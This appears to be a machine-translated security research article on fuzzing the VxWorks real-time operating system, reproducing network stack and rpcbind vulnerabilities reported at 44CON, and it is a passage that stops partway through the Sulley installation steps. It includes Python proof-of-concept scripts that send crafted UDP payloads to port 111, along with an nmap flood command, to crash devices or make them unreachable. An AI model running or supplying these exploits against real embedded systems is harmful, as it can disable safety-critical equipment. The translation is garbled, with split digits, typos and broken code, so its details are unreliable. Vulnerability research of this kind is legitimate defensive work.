VxWorks Fuzzing: VxWorks industrial real-time operating system vulnerability mining debugging with the use of secret-vulnerability warning-the black bar safety net

ID MYHACK58:62201671058
Type myhack58
Reporter 佚名
Modified 2016-01-16T00:00:00


VxWorks is the world's most widely used method in the embedded system deployed in real timeoperating system, is composed of the United States WindRiver company referred to Wind River Corporation, i.e., the WRS company in 1 9 8 3 years in design and development. Their market ranges across all safety critical areas, to name a few, including the Mars Curiosity Rover, the Boeing 7 8 7 Dreamliner, network router. These applications of security in high-risk sexual nature such that the VxWorks safety is highly concern. VxWorks operating system is by the United States Wind River(Wind River company)development of an embedded real-timeoperating system(RTOS), it has been claimed by at least 1, 5 billion devices, VxWorks supports almost all modern on the market of embedded CPU architectures, including the x86 family, MIPS, PowerPC, Freescale ColdFire, Intel i960, SPARC, SH-4, ARM, StrongARM and xScale CPU. In 2 0 1 5 years 9 months 9 days-1 1, organized by the 44CON London summit, Yannick Formaggio introduced him to VxWorks in-depth security research of the method, he uses a Fuzzing framework Sulley to the VxWorks system of the plurality of Protocol Fuzzing, and dig into some of the holes, and combined with the VxWorks WDB RPC implements a Remote Debugger and the related debugging analysis. Many of the achievement and the vulnerability details are not disclosed, we set up the VxWorks 5.5 and VxWorks 6. 6 x86 virtual environment, with reference to the Formaggio method, the VxWorks conducted a preliminary Safety study, the paper will be on the relevant study details and results are described. The contents of this document include: 1. Vulnerability overview 2. Install the Fuzzing framework Sulley & the relevant Protocol Fuzzing 3. VxWorks WDB RPC V2 analysis 4. Exposed on the Internet in the VxWorks WDB RPC V2 service!!! This article does not relates to all the study details and methods, and therefore provide the following relevant information for the supplementary reference: VxWorks 5.5 & 6.6 simulation environment to build vmWare runs on VxWorks(5.5) Python gray hat Chapter 9 Sulley Sulley official document: git项目目录文件sulley/docs/index.html 0×0 1 vulnerability overview We reproduce the Formaggio noted that security issues, no new issues, the vulnerability details are as follows: Network stack issues Vulnerability description: certain 5. x version of VxWorks system in a short period of time acceptable to a large number of network packets, can cause the network stack to crash, resulting in VxWorks not then with the external host communication. In some cases, the terminal will give an error message, the error message as shown below: ! It should be noted that, in some cases the vulnerability is triggered successfully caused a DoS, VxWorks terminal will not be output interrupt: panic: netJobAdd: ring buffer overflow! Tips, but in this case the VxWorks network stack has collapsed, has been unable to communicate with the outside world, this can be done by continuous ping to verify. Above error message generally will receive the amount of data packets is very large. Affects versions: Part 5. x version * Validation mode: 1. Nmap commands may need to be performed multiple times sudo nmap-sU-p110-1 6 6-r-T5-n, wherein the 1 9 2. 1 6 8. 1. 1 1 1 to run the VxWorks 5.5 version of the host IP, on receipt of the scan data after the packet, a VxWorks host and no error message, but the network stack has collapsed, no longer with the outside world to communicate. 2. For tcp/2 1 run the FTP service for continuous transmission of the volume of the great the FTP request packet. 3. Can also be used following Python code to verify the problem: import socket UDP_PAYLOAD = '\x72\xfe\x1d\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x01\x97\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' def poc1(host, rpcPort=1 1 1, pktNum=6 8 5 9): sock = socket. socket(socket. AF_INET, socket. SOCK_DGRAM) for i in xrange(pktNum): sock. sendto(UDP_PAYLOAD, (hvcost, 1 1 1)) def poc2(host, rpcPort=1 1 1, portNum=2 6): sock = socket. socket(socket. AF_INET, socket. SOCK_DGRAM) for port in xrange(rpcPort, rpcPort+portNum+1): sock. sendto(UDP_PAYLOAD, (host, port)) if name == 'main': import sys poc1(host=sys. argv[1], rpcPort=1 1 1, pktNum=1 0 0 0 0 0 0 0 0)

poc2(host=sys. argv[1], rpcPort=1 1 1, portNum=2 7)

rpcbind service issues Vulnerability description: rpcbind service is SUN-RPC part of the VxWorks system, the service listens on a tcp/1 1 1 and udp/1 1 1 port, the attacker to the Port to send through the special structure of the data packet, so that the rpcbind service to crash, the carefully constructed request may cause arbitrary code execution. The terminal will give an error message, the error message as shown below: ! Affected version: 5. x & 6. x Authentication: you can use the following Python code to verify the vulnerability: import socket PAYLOAD_HEX = 'cc6ff7e200000000000000020001a086000000040000000488888888000000110000001100001111111111111111111111111111' def poc(host, rpcPort=1 1 1): sock = socket. socket(socket. AF_INET, socket. SOCK_DGRAM) sock. sendto(PAYLOAD_HEX. decode('hex'), (host, rpcPort)) if name == 'main': import sys poc(sys. argv[1]) 0×0 2 Sulley installation & Protocol Fuzzing Formaggio use Sulley to VxWorks for Fuzzing, we learn his ways, try to achieve based on Sulley the Fuzzing of. Install Sulley On Sulley installation, the official has given a more detailed document: Sulley – Windows Installation FreeBuf there are also articles on the above document is a translation: * In a penetration test using fuzz technology(attached to the windows Installation Guide) Here is simple given our installation process, the environment is Win7 x86: the 1. MinGW

[1] [2] [3] [4] [5] next